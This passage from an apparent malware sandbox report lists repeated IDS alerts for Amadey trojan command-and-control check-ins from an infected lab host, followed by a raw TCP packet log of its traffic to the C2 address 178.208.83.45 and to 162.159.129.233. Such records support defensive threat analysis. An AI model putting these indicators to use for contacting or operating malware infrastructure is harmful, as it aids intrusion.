                          11/12/21-22:24:29.717760TCP2027700ET TROJAN Amadey CnC Check-In5017580192.168.2.4178.208.83.45
                          11/12/21-22:24:29.986485TCP2027700ET TROJAN Amadey CnC Check-In5017680192.168.2.4178.208.83.45
                          11/12/21-22:24:30.234415TCP2027700ET TROJAN Amadey CnC Check-In5017780192.168.2.4178.208.83.45
                          11/12/21-22:24:30.500457TCP2027700ET TROJAN Amadey CnC Check-In5017880192.168.2.4178.208.83.45
                          11/12/21-22:24:30.756517TCP2027700ET TROJAN Amadey CnC Check-In5017980192.168.2.4178.208.83.45
                          11/12/21-22:24:30.920149TCP2027700ET TROJAN Amadey CnC Check-In5018180192.168.2.4178.208.83.45
                          11/12/21-22:24:31.078808TCP2027700ET TROJAN Amadey CnC Check-In5018280192.168.2.4178.208.83.45
                          11/12/21-22:24:31.248144TCP2027700ET TROJAN Amadey CnC Check-In5018380192.168.2.4178.208.83.45
                          11/12/21-22:24:31.405377TCP2027700ET TROJAN Amadey CnC Check-In5018480192.168.2.4178.208.83.45
                          11/12/21-22:24:31.561638TCP2027700ET TROJAN Amadey CnC Check-In5018580192.168.2.4178.208.83.45
                          11/12/21-22:24:31.716538TCP2027700ET TROJAN Amadey CnC Check-In5018680192.168.2.4178.208.83.45
                          11/12/21-22:24:35.863840TCP2027700ET TROJAN Amadey CnC Check-In5018880192.168.2.4178.208.83.45
                          11/12/21-22:24:40.021142TCP2027700ET TROJAN Amadey CnC Check-In5019580192.168.2.4178.208.83.45
                          11/12/21-22:24:44.168960TCP2027700ET TROJAN Amadey CnC Check-In5021480192.168.2.4178.208.83.45
                          11/12/21-22:24:48.314734TCP2027700ET TROJAN Amadey CnC Check-In5021680192.168.2.4178.208.83.45
                          11/12/21-22:24:52.491757TCP2027700ET TROJAN Amadey CnC Check-In5021880192.168.2.4178.208.83.45
                          11/12/21-22:24:53.657302TCP2027700ET TROJAN Amadey CnC Check-In5022080192.168.2.4178.208.83.45
                          11/12/21-22:24:53.813380TCP2027700ET TROJAN Amadey CnC Check-In5022180192.168.2.4178.208.83.45
                          11/12/21-22:24:53.960979TCP2027700ET TROJAN Amadey CnC Check-In5021980192.168.2.4178.208.83.45
                          11/12/21-22:24:54.126594TCP2027700ET TROJAN Amadey CnC Check-In5022280192.168.2.4178.208.83.45
                          11/12/21-22:24:54.300175TCP2027700ET TROJAN Amadey CnC Check-In5022380192.168.2.4178.208.83.45
                          11/12/21-22:24:54.468603TCP2027700ET TROJAN Amadey CnC Check-In5022480192.168.2.4178.208.83.45
                          11/12/21-22:24:55.674157TCP2027700ET TROJAN Amadey CnC Check-In5022680192.168.2.4178.208.83.45
                          11/12/21-22:24:56.080648TCP2027700ET TROJAN Amadey CnC Check-In5022780192.168.2.4178.208.83.45
                          11/12/21-22:24:56.267755TCP2027700ET TROJAN Amadey CnC Check-In5022880192.168.2.4178.208.83.45
                          11/12/21-22:24:56.460183TCP2027700ET TROJAN Amadey CnC Check-In5022980192.168.2.4178.208.83.45
                          11/12/21-22:24:56.625072TCP2027700ET TROJAN Amadey CnC Check-In5023080192.168.2.4178.208.83.45
                          11/12/21-22:24:56.797413TCP2027700ET TROJAN Amadey CnC Check-In5023180192.168.2.4178.208.83.45
                          11/12/21-22:24:56.983191TCP2027700ET TROJAN Amadey CnC Check-In5023280192.168.2.4178.208.83.45
                          11/12/21-22:24:57.158143TCP2027700ET TROJAN Amadey CnC Check-In5023380192.168.2.4178.208.83.45
                          11/12/21-22:24:57.405001TCP2027700ET TROJAN Amadey CnC Check-In5023480192.168.2.4178.208.83.45
                          11/12/21-22:24:57.564311TCP2027700ET TROJAN Amadey CnC Check-In5023580192.168.2.4178.208.83.45
                          11/12/21-22:24:57.739643TCP2027700ET TROJAN Amadey CnC Check-In5023680192.168.2.4178.208.83.45
                          11/12/21-22:24:57.910067TCP2027700ET TROJAN Amadey CnC Check-In5023780192.168.2.4178.208.83.45
                          11/12/21-22:24:58.079689TCP2027700ET TROJAN Amadey CnC Check-In5023880192.168.2.4178.208.83.45
                          11/12/21-22:24:58.259755TCP2027700ET TROJAN Amadey CnC Check-In5023980192.168.2.4178.208.83.45

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Nov 12, 2021 22:23:06.708051920 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.730645895 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.730760098 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.731543064 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.754146099 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.754194975 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.754216909 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.754322052 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.790941000 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.791172028 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.791368961 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.791465998 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.813527107 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.813689947 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.813699961 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.813757896 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.813769102 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.813792944 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.813813925 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.813874006 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.813898087 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.836297989 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.836319923 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.836328030 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.836337090 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.836424112 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.836433887 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.836441994 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.836507082 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.836507082 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.836538076 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.836591959 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.836605072 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.836606979 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.836628914 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.836698055 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.836723089 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.859056950 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.859085083 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.859129906 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.859149933 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.859266043 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.859302998 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.859316111 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.859323978 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.862107992 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.862135887 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.862173080 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.862201929 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.862231016 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.862261057 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.862287045 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.862313986 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.862339020 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.862373114 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.862411976 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.862431049 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.862457991 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.881750107 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.881773949 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.881894112 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.881936073 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.882091999 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.884496927 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.885345936 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.902679920 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.904484034 CET4978380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.925129890 CET8049782178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.925226927 CET4978280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.927021980 CET8049783178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.927161932 CET4978380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.928394079 CET4978380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:06.951143026 CET8049783178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.958736897 CET8049783178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:06.958889008 CET4978380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.047933102 CET4978480192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:07.064618111 CET8049784162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:07.064835072 CET4978480192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:07.067578077 CET4978480192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:07.084086895 CET8049784162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:07.094263077 CET8049784162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:07.094923019 CET4978480192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:07.294545889 CET49785443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:07.294606924 CET44349785162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:07.294831991 CET49785443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:07.323609114 CET49785443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:07.323637009 CET44349785162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:07.375261068 CET44349785162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:07.375368118 CET49785443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:07.841463089 CET4978380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.842559099 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.863900900 CET8049783178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.865159988 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.865720034 CET4978380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.865803957 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.866349936 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.866434097 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.866624117 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.866744995 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.888586998 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.888598919 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.888674974 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.888816118 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.888892889 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.889095068 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.889848948 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.889859915 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.889874935 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.889883041 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.889967918 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.890017033 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.911640882 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.911654949 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.911935091 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.912337065 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.912420034 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.912441969 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.912451982 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.912462950 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.912508965 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.912513018 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.912518024 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.912548065 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.912549973 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.912580013 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.912617922 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.934226990 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.934242964 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.934308052 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.934329033 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.934434891 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.934747934 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.934762001 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.934811115 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.934842110 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.934895039 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.934947014 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.934967041 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.935015917 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.935091972 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.935138941 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.935159922 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.935220003 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.938461065 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.938589096 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.938652992 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.938817978 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.938859940 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.956912994 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.956928015 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.957041979 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.957206011 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.960891008 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.960905075 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.960918903 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.960973978 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.960984945 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.961005926 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.961008072 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.961011887 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.961014032 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.961086035 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.961184978 CET8049786178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:07.962372065 CET4978680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:07.966773033 CET49785443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:07.966804028 CET44349785162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:07.967402935 CET44349785162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:07.967487097 CET49785443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:07.970278978 CET49785443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:08.012876987 CET44349785162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:08.135951042 CET44349785162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:08.136017084 CET44349785162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:08.136064053 CET49785443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:08.136125088 CET49785443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:08.138911963 CET49785443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:08.138947010 CET44349785162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:08.320768118 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.343302011 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.343394041 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.344082117 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.344213009 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.344470024 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.344696999 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.366559982 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.366645098 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.366831064 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.366858959 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.366911888 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.366941929 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.366966963 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.367012978 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.367077112 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.367105007 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.367120981 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.367141008 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.367153883 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.367202044 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.367207050 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.367223978 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.367243052 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.367283106 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.367300034 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.389457941 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389492989 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389570951 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389585018 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389589071 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.389604092 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389621973 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389633894 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.389698029 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389707088 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.389713049 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389734030 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389748096 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389765024 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389770985 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.389827013 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.389830112 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389875889 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389893055 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389905930 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389918089 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389935017 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389945030 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.389947891 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389961958 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.389967918 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.390010118 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.390027046 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.412204981 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412225962 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412249088 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412261009 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412277937 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412291050 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412306070 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412318945 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412333012 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.412360907 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412368059 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.412374973 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412383080 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:08.412394047 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412463903 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412480116 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412492990 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412542105 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412554026 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412651062 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412715912 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412760019 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412772894 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412790060 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412801981 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412817001 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412830114 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412859917 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412877083 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412925005 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412938118 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412952900 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.412966013 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.413009882 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.413022041 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.413038015 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.413058996 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.413080931 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.413095951 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.413108110 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.413124084 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.434745073 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.434762955 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.434788942 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.434855938 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.434869051 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.434921026 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.434938908 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.434950113 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.435134888 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.435216904 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.435331106 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.435415983 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.435429096 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.438146114 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:08.438240051 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:09.297147989 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:09.298824072 CET4978880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:09.319670916 CET8049787178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:09.319840908 CET4978780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:09.321158886 CET8049788178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:09.321254015 CET4978880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:09.325980902 CET4978880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:09.326134920 CET4978880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:09.326395988 CET4978880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:09.326632977 CET4978880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:09.348371029 CET8049788178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:09.348395109 CET8049788178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:09.348423958 CET8049788178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:09.348532915 CET4978880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:09.348656893 CET8049788178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:09.348670959 CET8049788178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:09.348684072 CET8049788178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:09.348757982 CET8049788178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:09.348782063 CET4978880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:09.348834038 CET4978880192.168.2.4178.208.83.45
